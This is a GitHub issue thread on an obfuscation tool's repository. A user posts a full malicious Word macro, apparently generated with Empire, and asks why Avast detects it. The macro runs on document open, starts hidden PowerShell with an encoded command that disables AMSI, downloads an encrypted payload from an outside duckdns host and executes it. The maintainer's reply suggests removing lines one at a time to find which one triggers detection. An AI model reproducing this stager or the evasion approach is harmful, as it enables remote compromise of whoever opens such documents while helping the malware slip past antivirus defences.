### ISSUE TITLE
advice please?

### ISSUE THREAD

**Issue by gearcapitan** [Pepitoh/VBad#21]
![sin titulo](https://cloud.githubusercontent.com/assets/13740942/23446546/fd80422c-fe09-11e6-8c4d-8e901efe94f8.png)
http://nodistribute.com/result/bMDcKZIyVLOEpHiNad

my macro

Sub [rdm::21]AutoOpen()[!!]
	[rdm::21]Debugging[!!]
End Sub

Sub [rdm::21]Document_Open()[!!]
	[rdm::21]Debugging[!!]
End Sub

Public Function [rdm::21]Debugging()[!!] As Variant
	Dim [rdm::21]Azh[!!]
	[rdm::21]azh = "powershel"
	[rdm::21]azh = azh +[!!] "l.exe -NoP -sta -NonI -W Hidden -Enc WwBS"
	[rdm::21]azh = azh +[!!] "AEUAZgBdAC4AQQBTAFMARQBNAGIAbAB5AC4ARwBFAFQAVAB5AF"
	[rdm::21]azh = azh +[!!] "AARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUA"
	[rdm::21]azh = azh +[!!] "bgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQ"
	[rdm::21]azh = azh +[!!] "B0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBH"
	[rdm::21]azh = azh +[!!] "AGUAdABGAGkARQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAG"
	[rdm::21]azh = azh +[!!] "EAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMA"
	[rdm::21]azh = azh +[!!] "dABhAHQAaQBjACcAKQAuAFMAZQB0AFYAQQBsAHUAZQAoACQAbg"
	[rdm::21]azh = azh +[!!] "B1AGwATAAsACQAVABSAFUARQApAH0AOwBbAFMAWQBzAHQARQBN"
	[rdm::21]azh = azh +[!!] "AC4ATgBFAFQALgBTAGUAUgBWAGkAQwBlAFAAbwBJAG4AVABNAG"
	[rdm::21]azh = azh +[!!] "EATgBhAEcARQBSAF0AOgA6AEUAWABQAEUAQwB0ADEAMAAwAEMA"
	[rdm::21]azh = azh +[!!] "bwBuAHQASQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4AZQBXAC0ATw"
	[rdm::21]azh = azh +[!!] "BiAEoARQBjAHQAIABTAHkAUwBUAEUATQAuAE4AZQB0AC4AVwBF"
	[rdm::21]azh = azh +[!!] "AEIAQwBMAEkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAG"
	[rdm::21]azh = azh +[!!] "EALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYA"
	[rdm::21]azh = azh +[!!] "LgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALw"
	[rdm::21]azh = azh +[!!] "A3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAg"
	[rdm::21]azh = azh +[!!] "AEcAZQBjAGsAbwAnADsAJABXAGMALgBIAEUAYQBkAEUAcgBzAC"
	[rdm::21]azh = azh +[!!] "4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQA"
	[rdm::21]azh = azh +[!!] "dQApADsAJAB3AGMALgBQAHIAbwB4AFkAPQBbAFMAeQBTAHQAZQ"
	[rdm::21]azh = azh +[!!] "BtAC4ATgBFAFQALgBXAEUAQgBSAEUAUQB1AEUAUwB0AF0AOgA6"
	[rdm::21]azh = azh +[!!] "AEQARQBmAEEAdQBsAFQAVwBFAGIAUABSAE8AeABZADsAJAB3AG"
	[rdm::21]azh = azh +[!!] "MALgBQAHIATwB4AFkALgBDAFIARQBkAEUATgBUAEkAYQBMAFMA"
	[rdm::21]azh = azh +[!!] "IAA9ACAAWwBTAHkAUwB0AGUATQAuAE4AZQB0AC4AQwBSAEUARA"
	[rdm::21]azh = azh +[!!] "BFAG4AVABJAGEATABDAEEAQwBIAGUAXQA6ADoARABlAGYAYQB1"
	[rdm::21]azh = azh +[!!] "AEwAdABOAGUAVABXAE8AcgBrAEMAcgBlAEQARQBuAFQASQBBAE"
	[rdm::21]azh = azh +[!!] "wAcwA7ACQASwA9AFsAUwB5AHMAVABFAE0ALgBUAGUAWAB0AC4A"
	[rdm::21]azh = azh +[!!] "RQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQ"
	[rdm::21]azh = azh +[!!] "B0AEIAWQB0AGUAcwAoACcAaAB5AFIARAA7AEoANwA6AD0AdgB8"
	[rdm::21]azh = azh +[!!] "AGkAPwBPAFEAfQBCAEEATQBUADQAPgBqAFgAbwArAF0ALgA1AH"
	[rdm::21]azh = azh +[!!] "MANgAlACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIA"
	[rdm::21]azh = azh +[!!] "RwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQ"
	[rdm::21]azh = azh +[!!] "B8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABL"
	[rdm::21]azh = azh +[!!] "AFsAJABfACUAJABLAC4AQwBPAHUAbgBUAF0AKQAlADIANQA2AD"
	[rdm::21]azh = azh +[!!] "sAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQA"
	[rdm::21]azh = azh +[!!] "SgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQ"
	[rdm::21]azh = azh +[!!] "AoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAk"
	[rdm::21]azh = azh +[!!] "AFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsAC"
	[rdm::21]azh = azh +[!!] "QAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkA"
	[rdm::21]azh = azh +[!!] "XQA7ACQAXwAtAGIAWABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQ"
	[rdm::21]azh = azh +[!!] "ArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBj"
	[rdm::21]azh = azh +[!!] "AC4ASABFAGEARABFAFIAUwAuAEEARABkACgAIgBDAG8AbwBrAG"
	[rdm::21]azh = azh +[!!] "kAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AbgBzAGcASAA2AEgA"
	[rdm::21]azh = azh +[!!] "RQAyAHMAMABRAHoAYQBuADMAMgA1AEoASwBjADUAawBXADAAWQ"
	[rdm::21]azh = azh +[!!] "B2ADgAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAv"
	[rdm::21]azh = azh +[!!] "AG0AbQBzAG4AbQBpAGMAcgBvAHMAbwBmAHQALgBkAHUAYwBrAG"
	[rdm::21]azh = azh +[!!] "QAbgBzAC4AbwByAGcAOgA4ADAAMQAnADsAJAB0AD0AJwAvAGEA"
	[rdm::21]azh = azh +[!!] "ZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAZABhAHQAQQ"
	[rdm::21]azh = azh +[!!] "A9ACQAVwBDAC4ARABPAFcATgBMAE8AYQBEAEQAYQB0AGEAKAAk"
	[rdm::21]azh = azh +[!!] "AFMAZQBSACsAJABUACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbAD"
	[rdm::21]azh = azh +[!!] "AALgAuADMAXQA7ACQARABBAFQAYQA9ACQAZABhAFQAYQBbADQA"
	[rdm::21]azh = azh +[!!] "LgAuACQARABBAHQAYQAuAGwAZQBuAEcAVABoAF0AOwAtAGoAbw"
	[rdm::21]azh = azh +[!!] "BpAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABh"
	[rdm::21]azh = azh +[!!] "AFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
	Const [rdm::21]HIDDEN_WINDOW = 0[!!]
	Dim [rdm::21]azhComputer[!!]
	Dim [rdm::21]objConfig[!!]
	Dim [rdm::21]objProcess[!!]
	Dim [rdm::21]objStartup[!!]
	Dim [rdm::21]objWMIService[!!]
	Dim [rdm::21]intProcessID[!!]
	[rdm::21]azhComputer = "."[!!]
	Set [rdm::21]objWMIService = GetObject("winmgmts:\\" & azhComputer & "\root\cimv2")[!!]
	Set [rdm::21]objStartup = objWMIService.Get("Win32_ProcessStartup")[!!]
	Set [rdm::21]objConfig = objStartup.SpawnInstance_ [!!]
	[rdm::21]objConfig.ShowWindow = HIDDEN_WINDOW[!!]
	Set [rdm::21]objProcess = GetObject("winmgmts:\\" & azhComputer & "\root\cimv2:Win32_Process")[!!]
	[rdm::21]objProcess.Create azh, Null, objConfig, intProcessID[!!]
End Function

Avast is GOD!... hail avast haha

**Comment by Pepitoh** [comment]
Hi gearcapitan,

Sorry but it is not an issue relative to VBad. 
You are using a VBA (from what I see, generated with empire), Avast is probably detecting one of the following function at the end of your VBA. You should try to remove it line by line and see which one is detected. 

More over, I recommand you yo read more deaply Readme, obfuscation like : 
Set [rdm::21]objConfig = objStartup.SpawnInstance_ [!!] maakes no sense :)

Pepitoh
